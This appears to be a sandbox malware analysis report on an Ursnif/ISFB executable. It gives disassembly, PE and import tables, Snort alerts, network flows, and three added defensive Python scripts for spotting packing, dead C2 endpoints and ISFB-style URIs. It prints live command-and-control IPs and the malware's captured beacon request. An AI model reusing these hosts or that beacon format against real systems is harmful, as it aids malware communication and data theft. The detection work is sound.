                            Import Hash:ae274c29ca15928cb1e23f2e712ba155
                            Instruction
                            call 00007FB2F8A8F4AEh
                            jmp 00007FB2F8A88ECEh
                            mov edi, edi
                            push ebp
                            mov ebp, esp
                            mov eax, dword ptr [ebp+08h]
                            test eax, eax
                            je 00007FB2F8A89054h
                            sub eax, 08h
                            cmp dword ptr [eax], 0000DDDDh
                            jne 00007FB2F8A89049h
                            push eax
                            call 00007FB2F8A88667h
                            pop ecx
                            pop ebp
                            ret
                            mov edi, edi
                            push ebp
                            mov ebp, esp
                            mov eax, dword ptr [ebp+08h]
                            push esi
                            mov esi, ecx
                            mov byte ptr [esi+0Ch], 00000000h
                            test eax, eax
                            jne 00007FB2F8A890A5h
                            call 00007FB2F8A8C01Dh
                            mov dword ptr [esi+08h], eax
                            mov ecx, dword ptr [eax+6Ch]
                            mov dword ptr [esi], ecx
                            mov ecx, dword ptr [eax+68h]
                            mov dword ptr [esi+04h], ecx
                            mov ecx, dword ptr [esi]
                            cmp ecx, dword ptr [0042D710h]
                            je 00007FB2F8A89054h
                            mov ecx, dword ptr [0042D4C8h]
                            test dword ptr [eax+70h], ecx
                            jne 00007FB2F8A89049h
                            call 00007FB2F8A8FE88h
                            mov dword ptr [esi], eax
                            mov eax, dword ptr [esi+04h]
                            cmp eax, dword ptr [0042D3D0h]
                            je 00007FB2F8A89058h
                            mov eax, dword ptr [esi+08h]
                            mov ecx, dword ptr [0042D4C8h]
                            test dword ptr [eax+70h], ecx
                            jne 00007FB2F8A8904Ah
                            call 00007FB2F8A8F6E7h
                            mov dword ptr [esi+04h], eax
                            mov eax, dword ptr [esi+08h]
                            test byte ptr [eax+70h], 00000002h
                            jne 00007FB2F8A89056h
                            or dword ptr [eax+70h], 02h
                            mov byte ptr [esi+0Ch], 00000001h
                            jmp 00007FB2F8A8904Ch
                            mov ecx, dword ptr [eax]
                            mov dword ptr [esi], ecx
                            mov eax, dword ptr [eax+04h]
                            mov dword ptr [esi+04h], eax
                            mov eax, esi
                            pop esi
                            pop ebp
                            retn 0004h
                            mov edi, edi
                            push ebp
                            mov ebp, esp
                            sub esp, 10h
                            mov eax, dword ptr [0042CCD8h]
                            xor eax, ebp
                            mov dword ptr [ebp-04h], eax
                            mov edx, dword ptr [ebp+18h]
                            push ebx
                            Programming Language:
                            • [ASM] VS2010 build 30319
                            • [ C ] VS2010 build 30319
                            • [IMP] VS2008 SP1 build 30729
                            • [C++] VS2010 build 30319
                            • [RES] VS2010 build 30319
                            • [LNK] VS2010 build 30319
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x18f6c          0x78          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xac000          0xdd08        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x4320           0x40          .text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x1000           0x1d4         .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name   Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity      File Type  Entropy            Characteristics
.text  0x1000           0x18a14       0x18c00   False     0.5078519570707071   data       6.314209619196138  IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data  0x1a000          0x91248       0x13c00   False     0.9314057555379747   data       7.829501179808203  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc  0xac000          0xdd08        0xde00    False     0.40860782657657657  data       4.398436868519861  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
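The section table above shows .data with a VirtualSize of 0x91248 against a raw size of 0x13c00 and an entropy of 7.83 bits per byte: a small, near-random blob on disk that is expected to grow into a much larger region at run time, which is the profile behind the "Detected unpacking" signatures in this report. The Python below is an added example, not code from the Joe Sandbox report or from the sample, that walks a PE section table by hand and scores each section on exactly those indicators (entropy, VirtualSize versus SizeOfRawData, and writable-plus-executable rights). Because the sample itself is not on this page, it runs on a constructed, non-loadable PE stub built inline; the thresholds (7.0 bits/byte, 4x growth) are the author's choices, not values taken from the report.

```python
import hashlib
import math
import struct

# Constants from winnt.h
IMAGE_DOS_SIGNATURE = 0x5A4D          # "MZ"
IMAGE_NT_SIGNATURE = 0x00004550       # "PE\0\0"
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
SECTION_HEADER_FMT = "<8sIIIIIIHHI"    # IMAGE_SECTION_HEADER, 40 bytes

ENTROPY_THRESHOLD = 7.0  # bits/byte; compressed or encrypted blobs sit above this (author's choice)
GROWTH_RATIO = 4         # VirtualSize > 4x SizeOfRawData: section is filled in at run time (author's choice)


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, 0.0 .. 8.0."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes) -> list:
    """DOS header -> PE signature -> IMAGE_FILE_HEADER -> section table."""
    if struct.unpack_from("<H", pe, 0)[0] != IMAGE_DOS_SIGNATURE:
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if struct.unpack_from("<I", pe, e_lfanew)[0] != IMAGE_NT_SIGNATURE:
        raise ValueError("PE signature missing")
    file_hdr = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, file_hdr + 2)[0]   # IMAGE_FILE_HEADER.NumberOfSections
    opt_size = struct.unpack_from("<H", pe, file_hdr + 16)[0]      # IMAGE_FILE_HEADER.SizeOfOptionalHeader
    table = file_hdr + 20 + opt_size
    sections = []
    for i in range(num_sections):
        name, vsize, va, raw_size, raw_ptr, _, _, _, _, chars = struct.unpack_from(
            SECTION_HEADER_FMT, pe, table + i * struct.calcsize(SECTION_HEADER_FMT))
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "va": va, "vsize": vsize, "raw_size": raw_size,
            "characteristics": chars,
            "data": pe[raw_ptr:raw_ptr + raw_size],
        })
    return sections


def packing_indicators(pe: bytes) -> dict:
    """Entropy plus two layout checks per section; returns {name: {..., 'flags': [...]}}."""
    report = {}
    for s in parse_sections(pe):
        flags = []
        ent = shannon_entropy(s["data"])
        if ent >= ENTROPY_THRESHOLD:
            flags.append("high-entropy")
        if s["raw_size"] and s["vsize"] > GROWTH_RATIO * s["raw_size"]:
            flags.append("virtual-size-much-larger-than-raw")
        if s["characteristics"] & IMAGE_SCN_MEM_WRITE and s["characteristics"] & IMAGE_SCN_MEM_EXECUTE:
            flags.append("writable-and-executable")
        report[s["name"]] = {"entropy": round(ent, 3), "vsize": s["vsize"],
                             "raw_size": s["raw_size"], "flags": flags}
    return report


def _sha_stream(n: int, seed: bytes = b"constructed") -> bytes:
    """Deterministic high-entropy filler standing in for an encrypted payload (constructed data)."""
    out, block = b"", seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return out[:n]


def build_sample_pe() -> bytes:
    """Constructed, non-loadable PE stub: no optional header, two sections. Not the analysed sample."""
    text_raw = bytes(range(16)) * 256   # 4 KiB repeating pattern, entropy exactly 4.0
    data_raw = _sha_stream(4096)        # 4 KiB pseudo-random bytes, entropy close to 8
    text_off = 0x200
    data_off = text_off + len(text_raw)
    dos = struct.pack("<H58xI", IMAGE_DOS_SIGNATURE, 0x40)             # e_magic ... e_lfanew
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0, 0x0102)   # i386, 2 sections, no optional header
    text_hdr = struct.pack(SECTION_HEADER_FMT, b".text", 0x1000, 0x1000, len(text_raw), text_off,
                           0, 0, 0, 0, 0x60000020)   # CNT_CODE | MEM_EXECUTE | MEM_READ
    data_hdr = struct.pack(SECTION_HEADER_FMT, b".data", 0x9000, 0x2000, len(data_raw), data_off,
                           0, 0, 0, 0, 0xC0000040)   # CNT_INITIALIZED_DATA | MEM_READ | MEM_WRITE
    headers = (dos + b"PE\0\0" + file_hdr + text_hdr + data_hdr).ljust(text_off, b"\0")
    return headers + text_raw + data_raw


if __name__ == "__main__":
    for name, info in packing_indicators(build_sample_pe()).items():
        print(name, info)
```

Run against a real file with `packing_indicators(open(path, "rb").read())`. The two layout checks are what make the entropy score meaningful: a high-entropy .rsrc holding a compressed image is normal, but a high-entropy section whose VirtualSize is several times its raw size is reserving room for something it will write itself, and the sandbox's "changes PE section rights" signature is the run-time counterpart of the writable-and-executable flag.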
Name             RVA      Size    Type                                                            Language      Country
RT_CURSOR        0xb7f48  0x130   Device independent bitmap graphic, 32 x 64 x 1, image size 0
RT_CURSOR        0xb8090  0x130   Device independent bitmap graphic, 32 x 64 x 1, image size 0
RT_CURSOR        0xb81c0  0xf0    Device independent bitmap graphic, 24 x 48 x 1, image size 0
RT_CURSOR        0xb82b0  0x10a8  Device independent bitmap graphic, 32 x 64 x 32, image size 0
RT_ICON          0xac5e0  0x8a8   Device independent bitmap graphic, 32 x 64 x 8, image size 0    Sami Lappish  Finland
RT_ICON          0xac5e0  0x8a8   Device independent bitmap graphic, 32 x 64 x 8, image size 0    Sami Lappish  Norway
RT_ICON          0xac5e0  0x8a8   Device independent bitmap graphic, 32 x 64 x 8, image size 0    Sami Lappish  Sweden
RT_ICON          0xace88  0x10a8  Device independent bitmap graphic, 32 x 64 x 32, image size 0   Sami Lappish  Finland
RT_ICON          0xace88  0x10a8  Device independent bitmap graphic, 32 x 64 x 32, image size 0   Sami Lappish  Norway
RT_ICON          0xace88  0x10a8  Device independent bitmap graphic, 32 x 64 x 32, image size 0   Sami Lappish  Sweden
RT_ICON          0xadf58  0x8a8   Device independent bitmap graphic, 32 x 64 x 8, image size 0    Sami Lappish  Finland
RT_ICON          0xadf58  0x8a8   Device independent bitmap graphic, 32 x 64 x 8, image size 0    Sami Lappish  Norway
RT_ICON          0xadf58  0x8a8   Device independent bitmap graphic, 32 x 64 x 8, image size 0    Sami Lappish  Sweden
RT_ICON          0xae800  0x25a8  Device independent bitmap graphic, 48 x 96 x 32, image size 0   Sami Lappish  Finland
RT_ICON          0xae800  0x25a8  Device independent bitmap graphic, 48 x 96 x 32, image size 0   Sami Lappish  Norway
RT_ICON          0xae800  0x25a8  Device independent bitmap graphic, 48 x 96 x 32, image size 0   Sami Lappish  Sweden
RT_ICON          0xb0da8  0x10a8  Device independent bitmap graphic, 32 x 64 x 32, image size 0   Sami Lappish  Finland
RT_ICON          0xb0da8  0x10a8  Device independent bitmap graphic, 32 x 64 x 32, image size 0   Sami Lappish  Norway
RT_ICON          0xb0da8  0x10a8  Device independent bitmap graphic, 32 x 64 x 32, image size 0   Sami Lappish  Sweden
RT_ICON          0xb1e80  0xea8   Device independent bitmap graphic, 48 x 96 x 8, image size 0    Sami Lappish  Finland
RT_ICON          0xb1e80  0xea8   Device independent bitmap graphic, 48 x 96 x 8, image size 0    Sami Lappish  Norway
RT_ICON          0xb1e80  0xea8   Device independent bitmap graphic, 48 x 96 x 8, image size 0    Sami Lappish  Sweden
RT_ICON          0xb2d28  0x6c8   Device independent bitmap graphic, 24 x 48 x 8, image size 0    Sami Lappish  Finland
RT_ICON          0xb2d28  0x6c8   Device independent bitmap graphic, 24 x 48 x 8, image size 0    Sami Lappish  Norway
RT_ICON          0xb2d28  0x6c8   Device independent bitmap graphic, 24 x 48 x 8, image size 0    Sami Lappish  Sweden
RT_ICON          0xb33f0  0x568   Device independent bitmap graphic, 16 x 32 x 8, image size 0    Sami Lappish  Finland
RT_ICON          0xb33f0  0x568   Device independent bitmap graphic, 16 x 32 x 8, image size 0    Sami Lappish  Norway
RT_ICON          0xb33f0  0x568   Device independent bitmap graphic, 16 x 32 x 8, image size 0    Sami Lappish  Sweden
RT_ICON          0xb3958  0x25a8  Device independent bitmap graphic, 48 x 96 x 32, image size 0   Sami Lappish  Finland
RT_ICON          0xb3958  0x25a8  Device independent bitmap graphic, 48 x 96 x 32, image size 0   Sami Lappish  Norway
RT_ICON          0xb3958  0x25a8  Device independent bitmap graphic, 48 x 96 x 32, image size 0   Sami Lappish  Sweden
RT_ICON          0xb5f00  0x10a8  Device independent bitmap graphic, 32 x 64 x 32, image size 0   Sami Lappish  Finland
RT_ICON          0xb5f00  0x10a8  Device independent bitmap graphic, 32 x 64 x 32, image size 0   Sami Lappish  Norway
RT_ICON          0xb5f00  0x10a8  Device independent bitmap graphic, 32 x 64 x 32, image size 0   Sami Lappish  Sweden
RT_ICON          0xb6fa8  0x988   Device independent bitmap graphic, 24 x 48 x 32, image size 0   Sami Lappish  Finland
RT_ICON          0xb6fa8  0x988   Device independent bitmap graphic, 24 x 48 x 32, image size 0   Sami Lappish  Norway
RT_ICON          0xb6fa8  0x988   Device independent bitmap graphic, 24 x 48 x 32, image size 0   Sami Lappish  Sweden
RT_ICON          0xb7930  0x468   Device independent bitmap graphic, 16 x 32 x 32, image size 0   Sami Lappish  Finland
RT_ICON          0xb7930  0x468   Device independent bitmap graphic, 16 x 32 x 32, image size 0   Sami Lappish  Norway
RT_ICON          0xb7930  0x468   Device independent bitmap graphic, 16 x 32 x 32, image size 0   Sami Lappish  Sweden
RT_STRING        0xb95d8  0x3be   data                                                            Sami Lappish  Finland
RT_STRING        0xb95d8  0x3be   data                                                            Sami Lappish  Norway
RT_STRING        0xb95d8  0x3be   data                                                            Sami Lappish  Sweden
RT_STRING        0xb9998  0x36a   data                                                            Sami Lappish  Finland
RT_STRING        0xb9998  0x36a   data                                                            Sami Lappish  Norway
RT_STRING        0xb9998  0x36a   data                                                            Sami Lappish  Sweden
RT_ACCELERATOR   0xb7ea8  0x90    data                                                            Sami Lappish  Finland
RT_ACCELERATOR   0xb7ea8  0x90    data                                                            Sami Lappish  Norway
RT_ACCELERATOR   0xb7ea8  0x90    data                                                            Sami Lappish  Sweden
RT_ACCELERATOR   0xb7e00  0xa8    data                                                            Sami Lappish  Finland
RT_ACCELERATOR   0xb7e00  0xa8    data                                                            Sami Lappish  Norway
RT_ACCELERATOR   0xb7e00  0xa8    data                                                            Sami Lappish  Sweden
RT_GROUP_CURSOR  0xb8078  0x14    data
RT_GROUP_CURSOR  0xb9358  0x30    data
RT_GROUP_ICON    0xb1e50  0x30    data                                                            Sami Lappish  Finland
RT_GROUP_ICON    0xb1e50  0x30    data                                                            Sami Lappish  Norway
RT_GROUP_ICON    0xb1e50  0x30    data                                                            Sami Lappish  Sweden
RT_GROUP_ICON    0xadf30  0x22    data                                                            Sami Lappish  Finland
RT_GROUP_ICON    0xadf30  0x22    data                                                            Sami Lappish  Norway
RT_GROUP_ICON    0xadf30  0x22    data                                                            Sami Lappish  Sweden
RT_GROUP_ICON    0xb7d98  0x68    data                                                            Sami Lappish  Finland
RT_GROUP_ICON    0xb7d98  0x68    data                                                            Sami Lappish  Norway
RT_GROUP_ICON    0xb7d98  0x68    data                                                            Sami Lappish  Sweden
RT_VERSION       0xb9388  0x24c   data
None             0xb7f38  0xa     data                                                            Sami Lappish  Finland
None             0xb7f38  0xa     data                                                            Sami Lappish  Norway
None             0xb7f38  0xa     data                                                            Sami Lappish  Sweden
DLL           Import
KERNEL32.dll  PulseEvent, ReadConsoleInputW, GetFirmwareEnvironmentVariableW, GetCPInfoExW, CreateEventW, CopyFileExA, GetProcAddress, GlobalAlloc, SetDefaultCommConfigA, OpenWaitableTimerW, GetFileAttributesW, EnumResourceTypesW, WriteFileGather, GetModuleHandleW, InterlockedCompareExchange, UnhandledExceptionFilter, LocalFlags, GlobalLock, GetConsoleAliasW, WritePrivateProfileSectionA, FindFirstVolumeMountPointA, SetLastError, SleepEx, AddAtomA, lstrcmpA, SetCalendarInfoA, GetSystemWindowsDirectoryA, EnumTimeFormatsW, GetSystemDirectoryW, AddAtomW, GetExitCodeThread, _llseek, FindNextFileW, CopyFileA, GetShortPathNameW, EnumCalendarInfoA, EnumCalendarInfoExA, AddRefActCtx, SetStdHandle, WriteConsoleW, GetCurrentThreadId, LoadLibraryA, CloseHandle, SetFilePointer, ReadFile, FlushFileBuffers, InterlockedIncrement, InterlockedDecrement, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, EncodePointer, DecodePointer, GetLastError, HeapFree, RtlUnwind, RaiseException, HeapReAlloc, HeapAlloc, MoveFileA, DeleteFileA, GetCommandLineA, HeapSetInformation, GetStartupInfoW, WideCharToMultiByte, LCMapStringW, MultiByteToWideChar, GetCPInfo, IsProcessorFeaturePresent, HeapCreate, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameW, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, GetModuleFileNameA, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetACP, GetOEMCP, IsValidCodePage, GetStringTypeW, GetLocaleInfoW, HeapSize, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, LoadLibraryW, GetConsoleCP, GetConsoleMode, CreateFileW
USER32.dll    LoadMenuW
ADVAPI32.dll  LookupAccountSidW
SHELL32.dll   FindExecutableA
ole32.dll     CoGetInstanceFromFile
Language of compilation system  Country where language is spoken  Map
Sami Lappish                    Finland
Sami Lappish                    Norway
Sami Lappish                    Sweden
Timestamp                 Protocol  SID      Message                                                     Source Port  Dest Port  Source IP    Dest IP
03/14/23-15:00:52.733532  TCP       2033203  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)  49700        80         192.168.2.7  62.173.142.51
03/14/23-15:00:52.733532  TCP       2033204  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)  49700        80         192.168.2.7  62.173.142.51
Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Mar 14, 2023 15:00:52.673491001 CET  49700        80         192.168.2.7    62.173.142.51
Mar 14, 2023 15:00:52.732873917 CET  80           49700      62.173.142.51  192.168.2.7
Mar 14, 2023 15:00:52.733180046 CET  49700        80         192.168.2.7    62.173.142.51
Mar 14, 2023 15:00:52.733531952 CET  49700        80         192.168.2.7    62.173.142.51
Mar 14, 2023 15:00:52.793348074 CET  80           49700      62.173.142.51  192.168.2.7
Mar 14, 2023 15:00:52.794256926 CET  80           49700      62.173.142.51  192.168.2.7
Mar 14, 2023 15:00:52.794380903 CET  49700        80         192.168.2.7    62.173.142.51
Mar 14, 2023 15:00:52.803956032 CET  49700        80         192.168.2.7    62.173.142.51
Mar 14, 2023 15:00:52.863280058 CET  80           49700      62.173.142.51  192.168.2.7
Mar 14, 2023 15:01:12.834670067 CET  49701        80         192.168.2.7    94.103.183.153
Mar 14, 2023 15:01:15.835302114 CET  49701        80         192.168.2.7    94.103.183.153
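The TCP table above contains two flows: a completed exchange with 62.173.142.51:80 (the beacon the Snort rules fired on) and two outbound packets to 94.103.183.153:80 three seconds apart with nothing coming back. The Python below is an added example, not part of the Joe Sandbox report, that groups packet rows in the report's own column order by remote endpoint and flags endpoints the host kept contacting without ever receiving a reply; in a sandbox run that pattern usually marks a dead or sinkholed C2. The packet rows are copied from the table, and the sandbox host address 192.168.2.7 is taken from the report.

```python
import re
from datetime import datetime, timedelta

# The eleven TCP rows from the report above, in the table's own column order
# (Timestamp, Source Port, Dest Port, Source IP, Dest IP). Nothing here is invented.
TCP_ROWS = """\
Mar 14, 2023 15:00:52.673491001 CET 49700 80 192.168.2.7 62.173.142.51
Mar 14, 2023 15:00:52.732873917 CET 80 49700 62.173.142.51 192.168.2.7
Mar 14, 2023 15:00:52.733180046 CET 49700 80 192.168.2.7 62.173.142.51
Mar 14, 2023 15:00:52.733531952 CET 49700 80 192.168.2.7 62.173.142.51
Mar 14, 2023 15:00:52.793348074 CET 80 49700 62.173.142.51 192.168.2.7
Mar 14, 2023 15:00:52.794256926 CET 80 49700 62.173.142.51 192.168.2.7
Mar 14, 2023 15:00:52.794380903 CET 49700 80 192.168.2.7 62.173.142.51
Mar 14, 2023 15:00:52.803956032 CET 49700 80 192.168.2.7 62.173.142.51
Mar 14, 2023 15:00:52.863280058 CET 80 49700 62.173.142.51 192.168.2.7
Mar 14, 2023 15:01:12.834670067 CET 49701 80 192.168.2.7 94.103.183.153
Mar 14, 2023 15:01:15.835302114 CET 49701 80 192.168.2.7 94.103.183.153
"""

ROW_RE = re.compile(
    r"^(?P<ts>\w{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2})\.(?P<frac>\d+) \w+ "
    r"(?P<sport>\d+) (?P<dport>\d+) (?P<src>[\d.]+) (?P<dst>[\d.]+)$")


def parse_rows(text: str) -> list:
    """Parse report rows into (timestamp, sport, dport, src, dst); header and blank lines are skipped."""
    pkts = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%b %d, %Y %H:%M:%S")
        ts += timedelta(microseconds=int(m["frac"][:6].ljust(6, "0")))   # report has ns, datetime has us
        pkts.append((ts, int(m["sport"]), int(m["dport"]), m["src"], m["dst"]))
    return pkts


def summarize_flows(text: str, local_ip: str) -> dict:
    """Per remote (ip, port): packets out, packets in, first/last seen, inter-packet gaps in seconds."""
    flows = {}
    for ts, sport, dport, src, dst in parse_rows(text):
        if src == local_ip:
            key, direction = (dst, dport), "out"
        else:
            key, direction = (src, sport), "in"
        f = flows.setdefault(key, {"out": 0, "in": 0, "times": []})
        f[direction] += 1
        f["times"].append(ts)
    for f in flows.values():
        times = sorted(f.pop("times"))
        f["first"], f["last"] = times[0], times[-1]
        f["gaps"] = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    return flows


def unanswered(flows: dict) -> list:
    """Remote endpoints the host sent to at least twice without ever receiving a packet back."""
    return sorted(k for k, f in flows.items() if f["in"] == 0 and f["out"] >= 2)


if __name__ == "__main__":
    flows = summarize_flows(TCP_ROWS, "192.168.2.7")
    for key, f in flows.items():
        print(key, "out=%d in=%d gaps=%s" % (f["out"], f["in"], [round(g, 3) for g in f["gaps"]]))
    print("unanswered:", unanswered(flows))
```

For the second flow the only gap is almost exactly 3.0 s, which is consistent with a retransmitted connection attempt (Windows' default initial TCP retransmission timeout is 3 s); the report lists only timestamps and endpoints, not TCP flags, so the script reports the timing and leaves the interpretation to the analyst. The same grouping works on a full PCAP export as long as the row format matches `ROW_RE`.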
Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Mar 14, 2023 14:59:32.458257914 CET  59477        53         192.168.2.7  8.8.8.8
Mar 14, 2023 14:59:32.485673904 CET  53           59477      8.8.8.8      192.168.2.7
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                 Type            Class        DNS over HTTPS
Mar 14, 2023 14:59:32.458257914 CET  192.168.2.7  8.8.8.8  0xb87d    Standard query (0)  checklist.skype.com  A (IP address)  IN (0x0001)  false
Timestamp                            Source IP  Dest IP      Trans ID  Reply Code      Name                 CName  Address  Type            Class        DNS over HTTPS
Mar 14, 2023 14:59:32.485673904 CET  8.8.8.8    192.168.2.7  0xb87d    Name error (3)  checklist.skype.com  none   none     A (IP address)  IN (0x0001)  false
                            • 62.173.142.51
Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
0           192.168.2.7  49700        62.173.142.51   80                C:\Users\user\Desktop\KOYCdGz80D.exe
                            TimestampkBytes transferredDirectionData
                            Mar 14, 2023 15:00:52.733531952 CET101OUTGET /drew/nxxSRbXkG/Z9AQFeMulxsZ78vPJ0Ba/xgGOAFgVNpjYUN1Ulcb/8uwIiaMwLO1graJYCm8PkM/IU0adVtArkJ_2/BZSxJ28e/Tc5ERYxiq7NBJmMEOo_2FLz/U3IE7OaYn6/s6_2BEZEnVZDoNKzr/yGWuv6V_2Fey/ibIrbuFvdzu/G5cNIxcFhMXXH4/DW8BYhEM_2Bfx1WgbZGW2/9wbrpFGQVXKMRqQD/zmPaF1BbhLFtoKq/CFytgFZSMFNAbTktuc/B_2FQe4sV/W6Pv_2BAatm_2Ft2VjTv/WRtPQxXM/lSCDVEp9/l.jlk HTTP/1.1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Host: 62.173.142.51
                            Connection: Keep-Alive
                            Cache-Control: no-cache
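Both Snort alerts key on the `_2B` and `_2F` tokens in the request path. The Python below is an added example, not Joe Sandbox code, that normalises such a URI and extracts the indicators a detection or triage script would want. It assumes the layout documented for ISFB in published analyses: a fixed first directory, base64 data with '/' inserted at intervals and '+', '/', '=' escaped as `_2B`, `_2F`, `_3D`, then a file extension. The `_3D` escape and the remark about Serpent-CBC come from those analyses rather than from this page, and the decoded bytes stay encrypted because no key is on the page. The same block also checks the captured User-Agent for the browser-version/OS mismatch visible in the request headers.

```python
import base64
import re

# Request line captured in the session above, copied verbatim from this report.
CAPTURED_URI = (
    "/drew/nxxSRbXkG/Z9AQFeMulxsZ78vPJ0Ba/xgGOAFgVNpjYUN1Ulcb/8uwIiaMwLO1graJYCm8PkM"
    "/IU0adVtArkJ_2/BZSxJ28e/Tc5ERYxiq7NBJmMEOo_2FLz/U3IE7OaYn6/s6_2BEZEnVZDoNKzr"
    "/yGWuv6V_2Fey/ibIrbuFvdzu/G5cNIxcFhMXXH4/DW8BYhEM_2Bfx1WgbZGW2/9wbrpFGQVXKMRqQD"
    "/zmPaF1BbhLFtoKq/CFytgFZSMFNAbTktuc/B_2FQe4sV/W6Pv_2BAatm_2Ft2VjTv/WRtPQxXM"
    "/lSCDVEp9/l.jlk")
CAPTURED_UA = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)"

# "_" followed by the hex code of the base64 character it replaces. _2B and _2F are what the
# two Snort rules key on; _3D (padding) is documented for the family but does not occur here.
ESCAPES = {"_2B": "+", "_2F": "/", "_3D": "="}
ESCAPE_RE = re.compile(r"_2B|_2F|_3D")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+$")


def split_uri(uri: str):
    """-> (server_path, payload with '/' separators removed, extension).
    Assumed layout: /<fixed dir>/<escaped base64 with '/' inserted>.<ext>"""
    server_path, _, rest = uri.lstrip("/").partition("/")
    body, dot, ext = rest.rpartition(".")
    if not dot or not body or "/" in ext:
        raise ValueError("no <data>.<ext> tail")
    return server_path, body.replace("/", ""), ext


def decode_payload(joined: str) -> bytes:
    """Undo the escapes, restore stripped padding, base64-decode. The result is still the
    family's encrypted record (Serpent-CBC in documented ISFB builds); decryption needs the key."""
    b64 = ESCAPE_RE.sub(lambda m: ESCAPES[m.group(0)], joined)
    if not B64_RE.match(b64.rstrip("=")) or len(b64) % 4 == 1:
        raise ValueError("not base64 after unescaping")
    b64 += "=" * (-len(b64) % 4)
    return base64.b64decode(b64)


def isfb_uri_indicators(uri: str) -> dict:
    server_path, joined, ext = split_uri(uri)
    tokens_joined = ESCAPE_RE.findall(joined)
    tokens_raw = ESCAPE_RE.findall(uri)   # what a literal "_2B"/"_2F" content match sees
    blob = decode_payload(joined)
    return {
        "server_path": server_path,
        "extension": ext,
        "segments": uri.count("/"),
        "escape_tokens": len(tokens_joined),
        "escapes_split_by_slash": len(tokens_joined) - len(tokens_raw),
        "blob_len": len(blob),
        "block_aligned": len(blob) % 16 == 0,   # consistency check for a 16-byte block cipher
    }


def is_isfb_like(uri: str) -> bool:
    """Heuristic: deep path, at least one escape token, payload that decodes to >= 16 bytes."""
    try:
        ind = isfb_uri_indicators(uri)
    except ValueError:
        return False
    return ind["segments"] >= 4 and ind["escape_tokens"] >= 1 and ind["blob_len"] >= 16


# Lowest MSIE version that shipped with each Windows NT version (IE11 on 8.1 and 10).
MIN_IE_FOR_NT = {"5.1": 6, "6.0": 7, "6.1": 8, "6.2": 10, "6.3": 11, "10.0": 11}
UA_RE = re.compile(r"MSIE (\d+)\.\d+; Windows NT (\d+\.\d+)")


def ua_version_mismatch(ua: str) -> bool:
    """True when the claimed IE build is older than anything shipped on the claimed OS, or when an
    MSIE 8+ string lacks the Trident/ token every real IE8+ (including compatibility modes) sends."""
    m = UA_RE.search(ua)
    if not m:
        return False
    ie, nt = int(m.group(1)), m.group(2)
    if ie >= 8 and "Trident/" not in ua:
        return True
    return nt in MIN_IE_FOR_NT and ie < MIN_IE_FOR_NT[nt]


if __name__ == "__main__":
    print(isfb_uri_indicators(CAPTURED_URI))
    print("isfb-like:", is_isfb_like(CAPTURED_URI), "ua mismatch:", ua_version_mismatch(CAPTURED_UA))
```

Two details are worth checking on real traffic. First, the separator slashes are inserted without regard to the escapes, so in this capture one token straddles a segment boundary (`..._2/BZS...`); a literal `_2B` match on the raw path sees seven tokens, the normalised path eight, which is why normalising before matching matters and why a rule that only counts raw tokens can be tuned out. Second, IE11's compatibility and Enterprise modes do emit `MSIE 7.0` or `MSIE 8.0` strings on Windows 10, but always with a `Trident/` token; the captured header has none, which is the stronger signal here.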



Target ID: 0
